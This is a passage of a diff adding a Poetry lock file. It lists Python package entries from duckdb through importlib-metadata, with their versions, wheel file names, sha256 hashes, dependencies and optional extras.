+ {file = "duckdb-1.1.3-cp311-cp311-macosx_12_0_universal2.whl", hash = "sha256:911d58c22645bfca4a5a049ff53a0afd1537bc18fedb13bc440b2e5af3c46148"},
+ {file = "duckdb-1.1.3-cp311-cp311-macosx_12_0_x86_64.whl", hash = "sha256:c443d3d502335e69fc1e35295fcfd1108f72cb984af54c536adfd7875e79cee5"},
+ {file = "duckdb-1.1.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0a55169d2d2e2e88077d91d4875104b58de45eff6a17a59c7dc41562c73df4be"},
+ {file = "duckdb-1.1.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9d0767ada9f06faa5afcf63eb7ba1befaccfbcfdac5ff86f0168c673dd1f47aa"},
+ {file = "duckdb-1.1.3-cp311-cp311-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:51c6d79e05b4a0933672b1cacd6338f882158f45ef9903aef350c4427d9fc898"},
+ {file = "duckdb-1.1.3-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:183ac743f21c6a4d6adfd02b69013d5fd78e5e2cd2b4db023bc8a95457d4bc5d"},
+ {file = "duckdb-1.1.3-cp311-cp311-win_amd64.whl", hash = "sha256:a30dd599b8090ea6eafdfb5a9f1b872d78bac318b6914ada2d35c7974d643640"},
+ {file = "duckdb-1.1.3-cp312-cp312-macosx_12_0_arm64.whl", hash = "sha256:a433ae9e72c5f397c44abdaa3c781d94f94f4065bcbf99ecd39433058c64cb38"},
+ {file = "duckdb-1.1.3-cp312-cp312-macosx_12_0_universal2.whl", hash = "sha256:d08308e0a46c748d9c30f1d67ee1143e9c5ea3fbcccc27a47e115b19e7e78aa9"},
+ {file = "duckdb-1.1.3-cp312-cp312-macosx_12_0_x86_64.whl", hash = "sha256:5d57776539211e79b11e94f2f6d63de77885f23f14982e0fac066f2885fcf3ff"},
+ {file = "duckdb-1.1.3-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e59087dbbb63705f2483544e01cccf07d5b35afa58be8931b224f3221361d537"},
+ {file = "duckdb-1.1.3-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4ebf5f60ddbd65c13e77cddb85fe4af671d31b851f125a4d002a313696af43f1"},
+ {file = "duckdb-1.1.3-cp312-cp312-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:e4ef7ba97a65bd39d66f2a7080e6fb60e7c3e41d4c1e19245f90f53b98e3ac32"},
+ {file = "duckdb-1.1.3-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:f58db1b65593ff796c8ea6e63e2e144c944dd3d51c8d8e40dffa7f41693d35d3"},
+ {file = "duckdb-1.1.3-cp312-cp312-win_amd64.whl", hash = "sha256:e86006958e84c5c02f08f9b96f4bc26990514eab329b1b4f71049b3727ce5989"},
+ {file = "duckdb-1.1.3-cp313-cp313-macosx_12_0_arm64.whl", hash = "sha256:0897f83c09356206ce462f62157ce064961a5348e31ccb2a557a7531d814e70e"},
+ {file = "duckdb-1.1.3-cp313-cp313-macosx_12_0_universal2.whl", hash = "sha256:cddc6c1a3b91dcc5f32493231b3ba98f51e6d3a44fe02839556db2b928087378"},
+ {file = "duckdb-1.1.3-cp313-cp313-macosx_12_0_x86_64.whl", hash = "sha256:1d9ab6143e73bcf17d62566e368c23f28aa544feddfd2d8eb50ef21034286f24"},
+ {file = "duckdb-1.1.3-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2f073d15d11a328f2e6d5964a704517e818e930800b7f3fa83adea47f23720d3"},
+ {file = "duckdb-1.1.3-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d5724fd8a49e24d730be34846b814b98ba7c304ca904fbdc98b47fa95c0b0cee"},
+ {file = "duckdb-1.1.3-cp313-cp313-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:51e7dbd968b393343b226ab3f3a7b5a68dee6d3fe59be9d802383bf916775cb8"},
+ {file = "duckdb-1.1.3-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:00cca22df96aa3473fe4584f84888e2cf1c516e8c2dd837210daec44eadba586"},
+ {file = "duckdb-1.1.3-cp313-cp313-win_amd64.whl", hash = "sha256:77f26884c7b807c7edd07f95cf0b00e6d47f0de4a534ac1706a58f8bc70d0d31"},
+ {file = "duckdb-1.1.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a4748635875fc3c19a7320a6ae7410f9295557450c0ebab6d6712de12640929a"},
+ {file = "duckdb-1.1.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b74e121ab65dbec5290f33ca92301e3a4e81797966c8d9feef6efdf05fc6dafd"},
+ {file = "duckdb-1.1.3-cp37-cp37m-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:9c619e4849837c8c83666f2cd5c6c031300cd2601e9564b47aa5de458ff6e69d"},
+ {file = "duckdb-1.1.3-cp37-cp37m-win_amd64.whl", hash = "sha256:0ba6baa0af33ded836b388b09433a69b8bec00263247f6bf0a05c65c897108d3"},
+ {file = "duckdb-1.1.3-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:ecb1dc9062c1cc4d2d88a5e5cd8cc72af7818ab5a3c0f796ef0ffd60cfd3efb4"},
+ {file = "duckdb-1.1.3-cp38-cp38-macosx_12_0_universal2.whl", hash = "sha256:5ace6e4b1873afdd38bd6cc8fcf90310fb2d454f29c39a61d0c0cf1a24ad6c8d"},
+ {file = "duckdb-1.1.3-cp38-cp38-macosx_12_0_x86_64.whl", hash = "sha256:a1fa0c502f257fa9caca60b8b1478ec0f3295f34bb2efdc10776fc731b8a6c5f"},
+ {file = "duckdb-1.1.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6411e21a2128d478efbd023f2bdff12464d146f92bc3e9c49247240448ace5a6"},
+ {file = "duckdb-1.1.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c5336939d83837af52731e02b6a78a446794078590aa71fd400eb17f083dda3e"},
+ {file = "duckdb-1.1.3-cp38-cp38-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:f549af9f7416573ee48db1cf8c9d27aeed245cb015f4b4f975289418c6cf7320"},
+ {file = "duckdb-1.1.3-cp38-cp38-win_amd64.whl", hash = "sha256:2141c6b28162199999075d6031b5d63efeb97c1e68fb3d797279d31c65676269"},
+ {file = "duckdb-1.1.3-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:09c68522c30fc38fc972b8a75e9201616b96ae6da3444585f14cf0d116008c95"},
+ {file = "duckdb-1.1.3-cp39-cp39-macosx_12_0_universal2.whl", hash = "sha256:8ee97ec337794c162c0638dda3b4a30a483d0587deda22d45e1909036ff0b739"},
+ {file = "duckdb-1.1.3-cp39-cp39-macosx_12_0_x86_64.whl", hash = "sha256:a1f83c7217c188b7ab42e6a0963f42070d9aed114f6200e3c923c8899c090f16"},
+ {file = "duckdb-1.1.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1aa3abec8e8995a03ff1a904b0e66282d19919f562dd0a1de02f23169eeec461"},
+ {file = "duckdb-1.1.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:80158f4c7c7ada46245837d5b6869a336bbaa28436fbb0537663fa324a2750cd"},
+ {file = "duckdb-1.1.3-cp39-cp39-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:647f17bd126170d96a38a9a6f25fca47ebb0261e5e44881e3782989033c94686"},
+ {file = "duckdb-1.1.3-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:252d9b17d354beb9057098d4e5d5698e091a4f4a0d38157daeea5fc0ec161670"},
+ {file = "duckdb-1.1.3-cp39-cp39-win_amd64.whl", hash = "sha256:eeacb598120040e9591f5a4edecad7080853aa8ac27e62d280f151f8c862afa3"},
+ {file = "duckdb-1.1.3.tar.gz", hash = "sha256:68c3a46ab08836fe041d15dcbf838f74a990d551db47cb24ab1c4576fc19351c"},
+]
+
+[[package]]
+name = "et-xmlfile"
+version = "2.0.0"
+description = "An implementation of lxml.xmlfile for the standard library"
+optional = true
+python-versions = ">=3.8"
+files = [
+ {file = "et_xmlfile-2.0.0-py3-none-any.whl", hash = "sha256:7a91720bc756843502c3b7504c77b8fe44217c85c537d85037f0f536151b2caa"},
+ {file = "et_xmlfile-2.0.0.tar.gz", hash = "sha256:dab3f4764309081ce75662649be815c4c9081e88f0837825f90fd28317d4da54"},
+]
+
+[[package]]
+name = "exceptiongroup"
+version = "1.2.2"
+description = "Backport of PEP 654 (exception groups)"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "exceptiongroup-1.2.2-py3-none-any.whl", hash = "sha256:3111b9d131c238bec2f8f516e123e14ba243563fb135d3fe885990585aa7795b"},
+ {file = "exceptiongroup-1.2.2.tar.gz", hash = "sha256:47c2edf7c6738fafb49fd34290706d1a1a2f4d1c6df275526b62cbb4aa5393cc"},
+]
+
+[package.extras]
+test = ["pytest (>=6)"]
+
+[[package]]
+name = "filelock"
+version = "3.16.1"
+description = "A platform independent file lock."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "filelock-3.16.1-py3-none-any.whl", hash = "sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0"},
+ {file = "filelock-3.16.1.tar.gz", hash = "sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435"},
+]
+
+[package.extras]
+docs = ["furo (>=2024.8.6)", "sphinx (>=8.0.2)", "sphinx-autodoc-typehints (>=2.4.1)"]
+testing = ["covdefaults (>=2.3)", "coverage (>=7.6.1)", "diff-cover (>=9.2)", "pytest (>=8.3.3)", "pytest-asyncio (>=0.24)", "pytest-cov (>=5)", "pytest-mock (>=3.14)", "pytest-timeout (>=2.3.1)", "virtualenv (>=20.26.4)"]
+typing = ["typing-extensions (>=4.12.2)"]
+
+[[package]]
+name = "fonttools"
+version = "4.55.3"
+description = "Tools to manipulate font files"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "fonttools-4.55.3-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:1dcc07934a2165ccdc3a5a608db56fb3c24b609658a5b340aee4ecf3ba679dc0"},
+ {file = "fonttools-4.55.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:f7d66c15ba875432a2d2fb419523f5d3d347f91f48f57b8b08a2dfc3c39b8a3f"},
+ {file = "fonttools-4.55.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:27e4ae3592e62eba83cd2c4ccd9462dcfa603ff78e09110680a5444c6925d841"},
+ {file = "fonttools-4.55.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:62d65a3022c35e404d19ca14f291c89cc5890032ff04f6c17af0bd1927299674"},
+ {file = "fonttools-4.55.3-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:d342e88764fb201286d185093781bf6628bbe380a913c24adf772d901baa8276"},
+ {file = "fonttools-4.55.3-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:dd68c87a2bfe37c5b33bcda0fba39b65a353876d3b9006fde3adae31f97b3ef5"},
+ {file = "fonttools-4.55.3-cp310-cp310-win32.whl", hash = "sha256:1bc7ad24ff98846282eef1cbeac05d013c2154f977a79886bb943015d2b1b261"},
+ {file = "fonttools-4.55.3-cp310-cp310-win_amd64.whl", hash = "sha256:b54baf65c52952db65df39fcd4820668d0ef4766c0ccdf32879b77f7c804d5c5"},
+ {file = "fonttools-4.55.3-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:8c4491699bad88efe95772543cd49870cf756b019ad56294f6498982408ab03e"},
+ {file = "fonttools-4.55.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:5323a22eabddf4b24f66d26894f1229261021dacd9d29e89f7872dd8c63f0b8b"},
+ {file = "fonttools-4.55.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5480673f599ad410695ca2ddef2dfefe9df779a9a5cda89503881e503c9c7d90"},
+ {file = "fonttools-4.55.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:da9da6d65cd7aa6b0f806556f4985bcbf603bf0c5c590e61b43aa3e5a0f822d0"},
+ {file = "fonttools-4.55.3-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:e894b5bd60d9f473bed7a8f506515549cc194de08064d829464088d23097331b"},
+ {file = "fonttools-4.55.3-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:aee3b57643827e237ff6ec6d28d9ff9766bd8b21e08cd13bff479e13d4b14765"},
+ {file = "fonttools-4.55.3-cp311-cp311-win32.whl", hash = "sha256:eb6ca911c4c17eb51853143624d8dc87cdcdf12a711fc38bf5bd21521e79715f"},
+ {file = "fonttools-4.55.3-cp311-cp311-win_amd64.whl", hash = "sha256:6314bf82c54c53c71805318fcf6786d986461622dd926d92a465199ff54b1b72"},
+ {file = "fonttools-4.55.3-cp312-cp312-macosx_10_13_universal2.whl", hash = "sha256:f9e736f60f4911061235603a6119e72053073a12c6d7904011df2d8fad2c0e35"},
+ {file = "fonttools-4.55.3-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:7a8aa2c5e5b8b3bcb2e4538d929f6589a5c6bdb84fd16e2ed92649fb5454f11c"},
+ {file = "fonttools-4.55.3-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:07f8288aacf0a38d174445fc78377a97fb0b83cfe352a90c9d9c1400571963c7"},
+ {file = "fonttools-4.55.3-cp312-cp312-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b8d5e8916c0970fbc0f6f1bece0063363bb5857a7f170121a4493e31c3db3314"},
+ {file = "fonttools-4.55.3-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:ae3b6600565b2d80b7c05acb8e24d2b26ac407b27a3f2e078229721ba5698427"},
+ {file = "fonttools-4.55.3-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:54153c49913f45065c8d9e6d0c101396725c5621c8aee744719300f79771d75a"},
+ {file = "fonttools-4.55.3-cp312-cp312-win32.whl", hash = "sha256:827e95fdbbd3e51f8b459af5ea10ecb4e30af50221ca103bea68218e9615de07"},
+ {file = "fonttools-4.55.3-cp312-cp312-win_amd64.whl", hash = "sha256:e6e8766eeeb2de759e862004aa11a9ea3d6f6d5ec710551a88b476192b64fd54"},
+ {file = "fonttools-4.55.3-cp313-cp313-macosx_10_13_universal2.whl", hash = "sha256:a430178ad3e650e695167cb53242dae3477b35c95bef6525b074d87493c4bf29"},
+ {file = "fonttools-4.55.3-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:529cef2ce91dc44f8e407cc567fae6e49a1786f2fefefa73a294704c415322a4"},
+ {file = "fonttools-4.55.3-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8e75f12c82127486fac2d8bfbf5bf058202f54bf4f158d367e41647b972342ca"},
+ {file = "fonttools-4.55.3-cp313-cp313-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:859c358ebf41db18fb72342d3080bce67c02b39e86b9fbcf1610cca14984841b"},
+ {file = "fonttools-4.55.3-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:546565028e244a701f73df6d8dd6be489d01617863ec0c6a42fa25bf45d43048"},
+ {file = "fonttools-4.55.3-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:aca318b77f23523309eec4475d1fbbb00a6b133eb766a8bdc401faba91261abe"},
+ {file = "fonttools-4.55.3-cp313-cp313-win32.whl", hash = "sha256:8c5ec45428edaa7022f1c949a632a6f298edc7b481312fc7dc258921e9399628"},
+ {file = "fonttools-4.55.3-cp313-cp313-win_amd64.whl", hash = "sha256:11e5de1ee0d95af4ae23c1a138b184b7f06e0b6abacabf1d0db41c90b03d834b"},
+ {file = "fonttools-4.55.3-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:caf8230f3e10f8f5d7593eb6d252a37caf58c480b19a17e250a63dad63834cf3"},
+ {file = "fonttools-4.55.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b586ab5b15b6097f2fb71cafa3c98edfd0dba1ad8027229e7b1e204a58b0e09d"},
+ {file = "fonttools-4.55.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a8c2794ded89399cc2169c4d0bf7941247b8d5932b2659e09834adfbb01589aa"},
+ {file = "fonttools-4.55.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cf4fe7c124aa3f4e4c1940880156e13f2f4d98170d35c749e6b4f119a872551e"},
+ {file = "fonttools-4.55.3-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:86721fbc389ef5cc1e2f477019e5069e8e4421e8d9576e9c26f840dbb04678de"},
+ {file = "fonttools-4.55.3-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:89bdc5d88bdeec1b15af790810e267e8332d92561dce4f0748c2b95c9bdf3926"},
+ {file = "fonttools-4.55.3-cp38-cp38-win32.whl", hash = "sha256:bc5dbb4685e51235ef487e4bd501ddfc49be5aede5e40f4cefcccabc6e60fb4b"},
+ {file = "fonttools-4.55.3-cp38-cp38-win_amd64.whl", hash = "sha256:cd70de1a52a8ee2d1877b6293af8a2484ac82514f10b1c67c1c5762d38073e56"},
+ {file = "fonttools-4.55.3-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:bdcc9f04b36c6c20978d3f060e5323a43f6222accc4e7fcbef3f428e216d96af"},
+ {file = "fonttools-4.55.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:c3ca99e0d460eff46e033cd3992a969658c3169ffcd533e0a39c63a38beb6831"},
+ {file = "fonttools-4.55.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:22f38464daa6cdb7b6aebd14ab06609328fe1e9705bb0fcc7d1e69de7109ee02"},
+ {file = "fonttools-4.55.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ed63959d00b61959b035c7d47f9313c2c1ece090ff63afea702fe86de00dbed4"},
+ {file = "fonttools-4.55.3-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:5e8d657cd7326eeaba27de2740e847c6b39dde2f8d7cd7cc56f6aad404ddf0bd"},
+ {file = "fonttools-4.55.3-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:fb594b5a99943042c702c550d5494bdd7577f6ef19b0bc73877c948a63184a32"},
+ {file = "fonttools-4.55.3-cp39-cp39-win32.whl", hash = "sha256:dc5294a3d5c84226e3dbba1b6f61d7ad813a8c0238fceea4e09aa04848c3d851"},
+ {file = "fonttools-4.55.3-cp39-cp39-win_amd64.whl", hash = "sha256:aedbeb1db64496d098e6be92b2e63b5fac4e53b1b92032dfc6988e1ea9134a4d"},
+ {file = "fonttools-4.55.3-py3-none-any.whl", hash = "sha256:f412604ccbeee81b091b420272841e5ec5ef68967a9790e80bffd0e30b8e2977"},
+ {file = "fonttools-4.55.3.tar.gz", hash = "sha256:3983313c2a04d6cc1fe9251f8fc647754cf49a61dac6cb1e7249ae67afaafc45"},
+]
+
+[package.extras]
+all = ["brotli (>=1.0.1)", "brotlicffi (>=0.8.0)", "fs (>=2.2.0,<3)", "lxml (>=4.0)", "lz4 (>=1.7.4.2)", "matplotlib", "munkres", "pycairo", "scipy", "skia-pathops (>=0.5.0)", "sympy", "uharfbuzz (>=0.23.0)", "unicodedata2 (>=15.1.0)", "xattr", "zopfli (>=0.1.4)"]
+graphite = ["lz4 (>=1.7.4.2)"]
+interpolatable = ["munkres", "pycairo", "scipy"]
+lxml = ["lxml (>=4.0)"]
+pathops = ["skia-pathops (>=0.5.0)"]
+plot = ["matplotlib"]
+repacker = ["uharfbuzz (>=0.23.0)"]
+symfont = ["sympy"]
+type1 = ["xattr"]
+ufo = ["fs (>=2.2.0,<3)"]
+unicode = ["unicodedata2 (>=15.1.0)"]
+woff = ["brotli (>=1.0.1)", "brotlicffi (>=0.8.0)", "zopfli (>=0.1.4)"]
+
+[[package]]
+name = "fsspec"
+version = "2024.12.0"
+description = "File-system specification"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "fsspec-2024.12.0-py3-none-any.whl", hash = "sha256:b520aed47ad9804237ff878b504267a3b0b441e97508bd6d2d8774e3db85cee2"},
+ {file = "fsspec-2024.12.0.tar.gz", hash = "sha256:670700c977ed2fb51e0d9f9253177ed20cbde4a3e5c0283cc5385b5870c8533f"},
+]
+
+[package.extras]
+abfs = ["adlfs"]
+adl = ["adlfs"]
+arrow = ["pyarrow (>=1)"]
+dask = ["dask", "distributed"]
+dev = ["pre-commit", "ruff"]
+doc = ["numpydoc", "sphinx", "sphinx-design", "sphinx-rtd-theme", "yarl"]
+dropbox = ["dropbox", "dropboxdrivefs", "requests"]
+full = ["adlfs", "aiohttp (!=4.0.0a0,!=4.0.0a1)", "dask", "distributed", "dropbox", "dropboxdrivefs", "fusepy", "gcsfs", "libarchive-c", "ocifs", "panel", "paramiko", "pyarrow (>=1)", "pygit2", "requests", "s3fs", "smbprotocol", "tqdm"]
+fuse = ["fusepy"]
+gcs = ["gcsfs"]
+git = ["pygit2"]
+github = ["requests"]
+gs = ["gcsfs"]
+gui = ["panel"]
+hdfs = ["pyarrow (>=1)"]
+http = ["aiohttp (!=4.0.0a0,!=4.0.0a1)"]
+libarchive = ["libarchive-c"]
+oci = ["ocifs"]
+s3 = ["s3fs"]
+sftp = ["paramiko"]
+smb = ["smbprotocol"]
+ssh = ["paramiko"]
+test = ["aiohttp (!=4.0.0a0,!=4.0.0a1)", "numpy", "pytest", "pytest-asyncio (!=0.22.0)", "pytest-benchmark", "pytest-cov", "pytest-mock", "pytest-recording", "pytest-rerunfailures", "requests"]
+test-downstream = ["aiobotocore (>=2.5.4,<3.0.0)", "dask-expr", "dask[dataframe,test]", "moto[server] (>4,<5)", "pytest-timeout", "xarray"]
+test-full = ["adlfs", "aiohttp (!=4.0.0a0,!=4.0.0a1)", "cloudpickle", "dask", "distributed", "dropbox", "dropboxdrivefs", "fastparquet", "fusepy", "gcsfs", "jinja2", "kerchunk", "libarchive-c", "lz4", "notebook", "numpy", "ocifs", "pandas", "panel", "paramiko", "pyarrow", "pyarrow (>=1)", "pyftpdlib", "pygit2", "pytest", "pytest-asyncio (!=0.22.0)", "pytest-benchmark", "pytest-cov", "pytest-mock", "pytest-recording", "pytest-rerunfailures", "python-snappy", "requests", "smbprotocol", "tqdm", "urllib3", "zarr", "zstandard"]
+tqdm = ["tqdm"]
+
+[[package]]
+name = "ghp-import"
+version = "2.1.0"
+description = "Copy your docs directly to the gh-pages branch."
+optional = false
+python-versions = "*"
+files = [
+ {file = "ghp-import-2.1.0.tar.gz", hash = "sha256:9c535c4c61193c2df8871222567d7fd7e5014d835f97dc7b7439069e2413d343"},
+ {file = "ghp_import-2.1.0-py3-none-any.whl", hash = "sha256:8337dd7b50877f163d4c0289bc1f1c7f127550241988d568c1db512c4324a619"},
+]
+
+[package.dependencies]
+python-dateutil = ">=2.8.1"
+
+[package.extras]
+dev = ["flake8", "markdown", "twine", "wheel"]
+
+[[package]]
+name = "griffe"
+version = "1.4.0"
+description = "Signatures for entire Python programs. Extract the structure, the frame, the skeleton of your project, to generate API documentation or find breaking changes in your API."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "griffe-1.4.0-py3-none-any.whl", hash = "sha256:e589de8b8c137e99a46ec45f9598fc0ac5b6868ce824b24db09c02d117b89bc5"},
+ {file = "griffe-1.4.0.tar.gz", hash = "sha256:8fccc585896d13f1221035d32c50dec65830c87d23f9adb9b1e6f3d63574f7f5"},
+]
+
+[package.dependencies]
+astunparse = {version = ">=1.6", markers = "python_version < \"3.9\""}
+colorama = ">=0.4"
+
+[[package]]
+name = "huggingface-hub"
+version = "0.27.1"
+description = "Client library to download and publish models, datasets and other repos on the huggingface.co hub"
+optional = false
+python-versions = ">=3.8.0"
+files = [
+ {file = "huggingface_hub-0.27.1-py3-none-any.whl", hash = "sha256:1c5155ca7d60b60c2e2fc38cbb3ffb7f7c3adf48f824015b219af9061771daec"},
+ {file = "huggingface_hub-0.27.1.tar.gz", hash = "sha256:c004463ca870283909d715d20f066ebd6968c2207dae9393fdffb3c1d4d8f98b"},
+]
+
+[package.dependencies]
+filelock = "*"
+fsspec = ">=2023.5.0"
+packaging = ">=20.9"
+pyyaml = ">=5.1"
+requests = "*"
+tqdm = ">=4.42.1"
+typing-extensions = ">=3.7.4.3"
+
+[package.extras]
+all = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "fastapi", "gradio (>=4.0.0)", "jedi", "libcst (==1.4.0)", "mypy (==1.5.1)", "numpy", "pytest (>=8.1.1,<8.2.2)", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-mock", "pytest-rerunfailures", "pytest-vcr", "pytest-xdist", "ruff (>=0.5.0)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "typing-extensions (>=4.8.0)", "urllib3 (<2.0)"]
+cli = ["InquirerPy (==0.3.4)"]
+dev = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "fastapi", "gradio (>=4.0.0)", "jedi", "libcst (==1.4.0)", "mypy (==1.5.1)", "numpy", "pytest (>=8.1.1,<8.2.2)", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-mock", "pytest-rerunfailures", "pytest-vcr", "pytest-xdist", "ruff (>=0.5.0)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "typing-extensions (>=4.8.0)", "urllib3 (<2.0)"]
+fastai = ["fastai (>=2.4)", "fastcore (>=1.3.27)", "toml"]
+hf-transfer = ["hf-transfer (>=0.1.4)"]
+inference = ["aiohttp"]
+quality = ["libcst (==1.4.0)", "mypy (==1.5.1)", "ruff (>=0.5.0)"]
+tensorflow = ["graphviz", "pydot", "tensorflow"]
+tensorflow-testing = ["keras (<3.0)", "tensorflow"]
+testing = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "fastapi", "gradio (>=4.0.0)", "jedi", "numpy", "pytest (>=8.1.1,<8.2.2)", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-mock", "pytest-rerunfailures", "pytest-vcr", "pytest-xdist", "soundfile", "urllib3 (<2.0)"]
+torch = ["safetensors[torch]", "torch"]
+typing = ["types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "typing-extensions (>=4.8.0)"]
+
+[[package]]
+name = "identify"
+version = "2.6.1"
+description = "File identification library for Python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "identify-2.6.1-py2.py3-none-any.whl", hash = "sha256:53863bcac7caf8d2ed85bd20312ea5dcfc22226800f6d6881f232d861db5a8f0"},
+ {file = "identify-2.6.1.tar.gz", hash = "sha256:91478c5fb7c3aac5ff7bf9b4344f803843dc586832d5f110d672b19aa1984c98"},
+]
+
+[package.extras]
+license = ["ukkonen"]
+
+[[package]]
+name = "idna"
+version = "3.10"
+description = "Internationalized Domain Names in Applications (IDNA)"
+optional = false
+python-versions = ">=3.6"
+files = [
+ {file = "idna-3.10-py3-none-any.whl", hash = "sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3"},
+ {file = "idna-3.10.tar.gz", hash = "sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9"},
+]
+
+[package.extras]
+all = ["flake8 (>=7.1.1)", "mypy (>=1.11.2)", "pytest (>=8.3.2)", "ruff (>=0.6.2)"]
+
+[[package]]
+name = "importlib-metadata"
+version = "8.5.0"
+description = "Read metadata from Python packages"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "importlib_metadata-8.5.0-py3-none-any.whl", hash = "sha256:45e54197d28b7a7f1559e60b95e7c567032b602131fbd588f1497f47880aa68b"},
+ {file = "importlib_metadata-8.5.0.tar.gz", hash = "sha256:71522656f0abace1d072b9e5481a48f07c138e00f079c38c8f883823f9c26bd7"},
+]
+
+[package.dependencies]
+zipp = ">=3.20"
+
+[package.extras]
+check = ["pytest-checkdocs (>=2.4)", "pytest-ruff (>=0.2.1)"]
+cover = ["pytest-cov"]
+doc = ["furo", "jaraco.packaging (>=9.3)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"]
+enabler = ["pytest-enabler (>=2.2)"]
+perf = ["ipython"]
+test = ["flufl.flake8", "importlib-resources (>=1.3)", "jaraco.test (>=5.4)", "packaging", "pyfakefs", "pytest (>=6,!=8.1.*)", "pytest-perf (>=0.9.2)"]
+type = ["pytest-mypy"]
+
+[[package]]
+name = "importlib-resources"
+version = "6.4.5"
+description = "Read resources from Python packages"
+optional = false
+python-versions = ">=3.8"
+files = [
